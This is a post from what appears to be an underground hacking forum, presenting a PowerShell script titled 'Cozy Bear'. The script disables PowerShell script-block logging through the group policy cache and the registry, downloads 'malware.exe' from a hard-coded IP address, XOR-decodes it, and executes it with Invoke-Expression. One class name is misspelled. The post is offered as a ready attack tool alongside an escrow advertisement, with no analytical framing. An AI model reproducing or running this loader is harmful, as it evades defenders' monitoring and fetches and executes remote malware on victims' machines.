PowerShell Cozy Bear

PNK
ROOT

ROOT

SENSE!
Instructor
as safety deposit
$0.0
PowerShell Cozy Bear


#Code By E1.Coders
if ($PSVersionTable.PSVersion.Major -ge 3) {
$utils = [System.Management.Automation.Utils]
$cachedGroupPolicySettings = $utils::GetFieldValue([System.Management.Automination.Utils], "cachedGroupPolicySettings")
if ($cachedGroupPolicySettings) {
if ($cachedGroupPolicySettings.ContainsKey("EnableScriptBlockLogging")) {
$cachedGroupPolicySettings["EnableScriptBlockLogging"] = 0
$cachedGroupPolicySettings["EnableScriptBlockInvocationLogging"] = 0
}
Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\PowerShell" -Name "ScriptBlockLogging" -Value $cachedGroupPolicySettings["EnableScriptBlockLogging"]
}
$userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
$payloadUrl = "http://46.246.38.234/malware.exe"
$payloadPath = "$env:TEMP\malware.exe"
Invoke-WebRequest -Uri $payloadUrl -OutFile $payloadPath -UserAgent $userAgent
$key = 0x42
$payloadBytes = [System.IO.File]::ReadAllBytes($payloadPath)
$decryptedPayloadBytes = $payloadBytes | ForEach-Object { $_ -bxor $key }
$decryptedPayload = [System.Text.Encoding]::UTF8.GetString($decryptedPayloadBytes)
Invoke-Expression $decryptedPayload
} else {
Write-Host "PowerShell version 3 or later is required to run this script."
}
 
Legal warning We do not host or store any files on our website except thread messages, most likely your DMCA content is being hosted on a third-party website and you need to contact them. Representatives of this site ("service") are not responsible for any content created by users and for accounts. The materials presented express only the opinions of their authors.
🚨 Do not get Ripped Off ! ⚖️ Deal with approved sellers or use Leet Escrow on Telegram @leetlat
Back
Top